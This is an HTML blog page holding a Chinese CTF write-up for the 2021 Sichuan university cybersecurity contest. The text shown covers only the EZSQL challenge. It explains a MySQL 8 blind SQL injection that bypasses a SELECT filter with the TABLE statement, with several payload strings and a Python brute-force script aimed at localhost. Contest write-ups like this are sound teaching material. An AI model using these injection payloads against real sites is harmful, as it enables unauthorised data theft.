<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="2021年四川省大学生网络安全技能大赛  writeup一、战队信息战队名称：为什么各位师傅都这么强 战队编号：lx_2b05de 所属单位：cuit幼儿园 战队成员姓名：crilwa   Je3Z   w0s1np 二、解题情况 三、 解题过程题目一 EZSQL操作内容：考点：MYSQL8新特性 fuzz之后发现，只能盲注，过滤了select，使用1&#39; and (ascii(substr">
<meta property="og:type" content="article">
<meta property="og:title" content="2021年四川省大学生网络安全技能大赛  writeup">
<meta property="og:url" content="http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/index.html">
<meta property="og:site_name" content="w0s1np&#39;s blog">
<meta property="og:description" content="2021年四川省大学生网络安全技能大赛  writeup一、战队信息战队名称：为什么各位师傅都这么强 战队编号：lx_2b05de 所属单位：cuit幼儿园 战队成员姓名：crilwa   Je3Z   w0s1np 二、解题情况 三、 解题过程题目一 EZSQL操作内容：考点：MYSQL8新特性 fuzz之后发现，只能盲注，过滤了select，使用1&#39; and (ascii(substr">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/wzimg/233.png">
<meta property="og:image" content="http://example.com/wzimg/186.png">
<meta property="og:image" content="http://example.com/wzimg/187.png">
<meta property="og:image" content="http://example.com/wzimg/188.png">
<meta property="og:image" content="http://example.com/wzimg/189.png">
<meta property="og:image" content="http://example.com/wzimg/190.png">
<meta property="og:image" content="http://example.com/wzimg/191.png">
<meta property="og:image" content="http://example.com/wzimg/192.png">
<meta property="og:image" content="http://example.com/wzimg/193.png">
<meta property="og:image" content="http://example.com/wzimg/194.png">
<meta property="og:image" content="http://example.com/wzimg/195.png">
<meta property="og:image" content="http://example.com/wzimg/196.png">
<meta property="og:image" content="http://example.com/wzimg/197.png">
<meta property="og:image" content="http://example.com/wzimg/198.png">
<meta property="og:image" content="http://example.com/wzimg/199.png">
<meta property="og:image" content="http://example.com/wzimg/200.png">
<meta property="og:image" content="http://example.com/wzimg/201.png">
<meta property="og:image" content="http://example.com/wzimg/210.png">
<meta property="og:image" content="http://example.com/wzimg/211.png">
<meta property="og:image" content="http://example.com/wzimg/212.png">
<meta property="og:image" content="http://example.com/wzimg/213.png">
<meta property="og:image" content="http://example.com/wzimg/214.png">
<meta property="og:image" content="http://example.com/wzimg/215.png">
<meta property="og:image" content="http://example.com/wzimg/216.png">
<meta property="og:image" content="http://example.com/wzimg/217.png">
<meta property="og:image" content="http://example.com/wzimg/218.png">
<meta property="og:image" content="http://example.com/wzimg/219.png">
<meta property="og:image" content="http://example.com/wzimg/220.png">
<meta property="og:image" content="http://example.com/wzimg/221.png">
<meta property="og:image" content="http://example.com/wzimg/222.png">
<meta property="og:image" content="http://example.com/wzimg/223.png">
<meta property="og:image" content="http://example.com/wzimg/224.png">
<meta property="og:image" content="http://example.com/wzimg/225.png">
<meta property="og:image" content="http://example.com/wzimg/226.png">
<meta property="og:image" content="http://example.com/wzimg/227.png">
<meta property="og:image" content="http://example.com/wzimg/228.png">
<meta property="og:image" content="http://example.com/wzimg/229.png">
<meta property="og:image" content="http://example.com/wzimg/230.png">
<meta property="og:image" content="http://example.com/wzimg/231.png">
<meta property="og:image" content="http://example.com/wzimg/234.png">
<meta property="og:image" content="http://example.com/wzimg/232.png">
<meta property="article:published_time" content="2021-05-19T13:17:08.000Z">
<meta property="article:modified_time" content="2021-05-19T13:52:25.827Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/wzimg/233.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>2021年四川省大学生网络安全技能大赛  writeup</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/projects_url">Projects</a></li><!--
     --><!--
       --><li><a href="/%5Bobject%20Object%5D">highlight</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2021/05/23/%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2021/04/27/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&text=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&title=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&is_video=false&description=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=2021年四川省大学生网络安全技能大赛  writeup&body=Check out this article: http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&title=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&title=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&title=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&title=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&name=2021年四川省大学生网络安全技能大赛  writeup&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&t=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup"><span class="toc-number">1.</span> <span class="toc-text">2021年四川省大学生网络安全技能大赛  writeup</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E6%88%98%E9%98%9F%E4%BF%A1%E6%81%AF"><span class="toc-number">1.1.</span> <span class="toc-text">一、战队信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E8%A7%A3%E9%A2%98%E6%83%85%E5%86%B5"><span class="toc-number">1.2.</span> <span class="toc-text">二、解题情况</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81-%E8%A7%A3%E9%A2%98%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.</span> <span class="toc-text">三、 解题过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%B8%80-EZSQL"><span class="toc-number">1.3.1.</span> <span class="toc-text">题目一 EZSQL</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A"><span class="toc-number">1.3.2.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%E5%80%BC"><span class="toc-number">1.3.3.</span> <span class="toc-text">flag值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%BA%8C-papapa"><span class="toc-number">1.3.4.</span> <span class="toc-text">题目二 papapa</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-1"><span class="toc-number">1.3.5.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%E5%80%BC-1"><span class="toc-number">1.3.6.</span> <span class="toc-text">flag值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%B8%89-Misc-%E6%88%91%E7%9A%84%E4%B8%96%E7%95%8C"><span class="toc-number">1.3.7.</span> <span class="toc-text">题目三 Misc 我的世界</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-2"><span class="toc-number">1.3.8.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%9B%9B-Misc-disk-recover"><span class="toc-number">1.3.9.</span> <span class="toc-text">题目四 Misc disk-recover</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-3"><span class="toc-number">1.3.10.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag"><span class="toc-number">1.3.11.</span> <span class="toc-text">flag:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%BA%94-Misc-pack"><span class="toc-number">1.3.12.</span> <span class="toc-text">题目五 Misc pack</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9"><span class="toc-number">1.3.13.</span> <span class="toc-text">操作内容:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.4.</span> <span class="toc-text"></span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%EF%BC%9A"><span class="toc-number">1.4.1.</span> <span class="toc-text">flag：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-0bed66d154ccbdd07a6342abf97a5cfc"><span class="toc-number">1.4.2.</span> <span class="toc-text">flag{0bed66d154ccbdd07a6342abf97a5cfc}</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%85%AD-em0ji"><span class="toc-number">1.4.3.</span> <span class="toc-text">题目六 em0ji</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-4"><span class="toc-number">1.4.4.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-1"><span class="toc-number">1.4.5.</span> <span class="toc-text">flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%B8%83-easy-re"><span class="toc-number">1.4.6.</span> <span class="toc-text">题目七 easy_re</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-5"><span class="toc-number">1.4.7.</span> <span class="toc-text">操作内容：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%84%9A%E6%9C%AC"><span class="toc-number">1.4.7.1.</span> <span class="toc-text">脚本</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%E5%80%BC-2"><span class="toc-number">1.4.8.</span> <span class="toc-text">flag值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%85%AB-easy-pyc"><span class="toc-number">1.4.9.</span> <span class="toc-text">题目八 easy.pyc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-6"><span class="toc-number">1.4.10.</span> <span class="toc-text">操作内容：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%84%9A%E6%9C%AC-1"><span class="toc-number">1.4.10.1.</span> <span class="toc-text">脚本</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%E5%80%BC-3"><span class="toc-number">1.4.11.</span> <span class="toc-text">flag值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%B9%9D-base%E5%8F%98%E5%BD%A2%E8%AE%A1-exe"><span class="toc-number">1.4.12.</span> <span class="toc-text">题目九 base变形计.exe</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-7"><span class="toc-number">1.4.13.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-2"><span class="toc-number">1.4.14.</span> <span class="toc-text">flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%8D%81-2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B%E9%97%AE%E5%8D%B7%E8%B0%83%E6%9F%A5"><span class="toc-number">1.4.15.</span> <span class="toc-text">题目十 2021年四川省大学生网络安全技能大赛问卷调查</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-8"><span class="toc-number">1.4.16.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%84%9A%E6%9C%AC-2"><span class="toc-number">1.4.17.</span> <span class="toc-text">脚本:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-3"><span class="toc-number">1.4.18.</span> <span class="toc-text">flag:</span></a></li></ol></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        2021年四川省大学生网络安全技能大赛  writeup
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-05-19T13:17:08.000Z" itemprop="datePublished">2021-05-19</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/writeup/" rel="tag">writeup</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="2021年四川省大学生网络安全技能大赛-writeup"><a href="#2021年四川省大学生网络安全技能大赛-writeup" class="headerlink" title="2021年四川省大学生网络安全技能大赛  writeup"></a>2021年四川省大学生网络安全技能大赛  writeup</h1><h2 id="一、战队信息"><a href="#一、战队信息" class="headerlink" title="一、战队信息"></a>一、战队信息</h2><p>战队名称：为什么各位师傅都这么强</p>
<p>战队编号：lx_2b05de</p>
<p>所属单位：cuit幼儿园</p>
<p>战队成员姓名：crilwa   Je3Z   w0s1np</p>
<h2 id="二、解题情况"><a href="#二、解题情况" class="headerlink" title="二、解题情况"></a><strong>二、</strong>解题情况</h2><p><img src="/wzimg/233.png" alt="image-20210515203234703"></p>
<h2 id="三、-解题过程"><a href="#三、-解题过程" class="headerlink" title="三、 解题过程"></a><strong>三、</strong> 解题过程</h2><h3 id="题目一-EZSQL"><a href="#题目一-EZSQL" class="headerlink" title="题目一 EZSQL"></a>题目一 EZSQL</h3><h3 id="操作内容："><a href="#操作内容：" class="headerlink" title="操作内容："></a>操作内容：</h3><p>考点：MYSQL8新特性</p>
<p>fuzz之后发现，只能盲注，过滤了<code>select</code>，使用<code>1&#39; and (ascii(substr(database(),1,1)))&gt;num --+ </code>可以盲注出数据库，但是后面就搞不动了</p>
<p>无select注入，使用的是table语句。</p>
<blockquote>
<p>TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]</p>
</blockquote>
<p>这个作用是列出表的全部内容，于是就可以利用这个语句来进行注入。</p>
<p>首先需要知道表名使用MySQL一些自带的特殊表来盲注表</p>
<blockquote>
<p>information_schema.TABLESPACES_EXTENSIONS</p>
</blockquote>
<p><img src="/wzimg/186.png" alt="图片"></p>
<p>使用这个语句来一个一个字段的注入出表名，使用这个语句进行注入只能单列查询不能如同联合查询一般使用<code>group_concat</code>来连接要查询的字段。所以只能用<code>limit</code>来限制输出的内容。</p>
<p><img src="/wzimg/187.png" alt="图片"></p>
<p>使用盲注将所需的表名注入出来<br><img src="/wzimg/188.png" alt="图片"></p>
<p>这里两个空位代表着表的两个字段，一张表中有多少个字段就要有多少个空位。</p>
<p>在注入时还有几个规律要注意：</p>
<p>首先需要从第一个字段开始猜解数据，如果不按顺序来得到的数据永真。<br><img src="/wzimg/189.png" alt="图片"></p>
<p><img src="/wzimg/190.png" alt="图片"></p>
<p>其实第二个字段应该为空，所以需要从第一个字段开始猜解。这是坑点之一，也算是一个难点。</p>
<p>第二个难点是猜解字符串时<code>true</code>和<code>false</code>的出现时机，在最后一位字符之前都是相同的。</p>
<p>在前面的字符猜解时，直到正确的字符出现时，ascii码小于或等于这个字符的查询结果永真。</p>
<p><img src="/wzimg/191.png" alt="图片"></p>
<p><img src="/wzimg/192.png" alt="图片"></p>
<p>这个字段的值为<code>mysql</code>因此到<code>m</code>之前的所有字符都为真。<br><img src="/wzimg/193.png" alt="图片"></p>
<p>直到<code>n</code>这个字符，也就是大于<code>m</code>的才会为假。</p>
<p>只能使用字符串拼接的方式逐字查询也就是<code>m my mys</code>这样的方式逐步拼接字符串<br><img src="/wzimg/194.png" alt="图片"></p>
<p>在最后一个字符时规则又跟之前的字符不同，当查询的字符串到达最后一个字符时，ascii码小于这个字符的永真，大于或等于这个字符的才为假。<br><img src="/wzimg/195.png" alt="图片"></p>
<p><img src="/wzimg/196.png" alt="图片"></p>
<p>最后一个要点，当第一个字符是正确时后面拼接的字符才能正确判断</p>
<blockquote>
<p>mysql&lt;=mysql aasda&lt;=mysql gasdassd &lt;=mysql</p>
</blockquote>
<p>这三种情况都是真，第一个字符不正确且结果为真的情况下无论怎么拼接字符串，输出的结果都为真。</p>
<p>先爆破表数量再注入猜解表名</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs csharp"><span class="hljs-number">1&#x27;</span><span class="hljs-keyword">and</span>(<span class="hljs-string">&#x27;&#123;&#125;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>)&lt;=(TABLE<span class="hljs-comment">/**/</span>information_schema.TABLESPACES_EXTENSIONS<span class="hljs-comment">/**/</span>LIMIT <span class="hljs-number">0</span>,<span class="hljs-number">1</span>)--+<br></code></pre></td></tr></table></figure>

<p>​                                                                                     <img src="/wzimg/197.png" alt="图片"></p>
<p><img src="/wzimg/198.png" alt="图片"></p>
<p><img src="/wzimg/199.png" alt="图片"></p>
<p>得到表名后再猜字段数 ,一个个加空格直到结果为真</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">payload</span>=<span class="hljs-string">&quot;1&#x27;and(&quot;</span><span class="hljs-string">&quot;,&quot;</span><span class="hljs-string">&quot;,&quot;</span><span class="hljs-string">&quot;)&lt;=(TABLE/*\**\*/fakeflag/\*\*/limit/**/0,1)--+&quot;</span><br></code></pre></td></tr></table></figure>

<p><img src="/wzimg/200.png" alt="图片"></p>
<p><img src="/wzimg/201.png" alt="图片"></p>
<p>最后就是从第一个字段开始注数据慢慢找flag了。</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">payload</span>=<span class="hljs-string">&quot;1&#x27;and(4,&quot;</span>fl4gg<span class="hljs-string">&quot;,&quot;</span>&#123;&#125;<span class="hljs-string">&quot;)&lt;=(TABLE/**/fakeflag/**/limit/**/3,1)--+&quot;</span><br></code></pre></td></tr></table></figure>



<p>脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">from</span> urllib <span class="hljs-keyword">import</span> parse<br><span class="hljs-built_in">ascii</span>=<span class="hljs-string">&quot;/0123456789:;ABCDEFGHIJKLMNOPQRSTUYWXYZ_.abcdefghijklmnopqrstuvwxyz&#123;|&#125;~&quot;</span><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">exp</span>(<span class="hljs-params">url</span>):</span><br>    result=<span class="hljs-string">&quot;&quot;</span><br>    tablename=<span class="hljs-string">&quot;&quot;</span><br>    j=<span class="hljs-number">0</span><br>    <span class="hljs-keyword">while</span> j&lt;=<span class="hljs-number">100</span>:<br>        j+=<span class="hljs-number">1</span><br>        tablename=result<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">ascii</span>:<br><br>            payload=<span class="hljs-string">&quot;1&#x27;and(4,\&quot;fl4gg\&quot;,\&quot;&#123;&#125;\&quot;)&lt;=(TABLE/**/fakeflag/**/limit/**/3,1)--+&quot;</span>.<span class="hljs-built_in">format</span>(tablename+i)<br>            <span class="hljs-comment">#payload=&quot;1&#x27;and(&#x27;&#123;&#125;&#x27;,&#x27;&#x27;)&lt;=(TABLE/**/information_schema.TABLESPACES_EXTENSIONS/**/LIMIT 7,1)--+&quot;.format(tablename+i)</span><br>            re=requests.get(url+payload)<br>            <span class="hljs-comment">#print(url+payload)</span><br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;Enjoy This Game&quot;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> re.text:<br>                result+=<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(i)-<span class="hljs-number">1</span>)<br>                <span class="hljs-built_in">print</span>(result)<br>                <span class="hljs-keyword">break</span><br>    result=result[:-<span class="hljs-number">1</span>]+<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(result[-<span class="hljs-number">1</span>])+<span class="hljs-number">1</span>)<br>    <span class="hljs-built_in">print</span>(result)<br><br>url=<span class="hljs-string">&quot;http://127.0.0.1/?id=&quot;</span><br>exp(url)<br></code></pre></td></tr></table></figure>

